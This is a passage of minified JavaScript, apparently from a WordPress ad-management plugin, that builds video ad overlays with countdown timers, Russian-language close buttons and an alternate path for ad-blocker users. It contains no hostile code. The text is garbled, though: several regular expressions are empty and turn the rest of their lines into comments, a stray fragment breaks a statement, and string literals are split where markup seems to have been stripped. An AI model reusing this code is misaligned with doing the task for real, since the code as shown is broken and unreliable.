t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n<=0&&(clearInterval(r),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};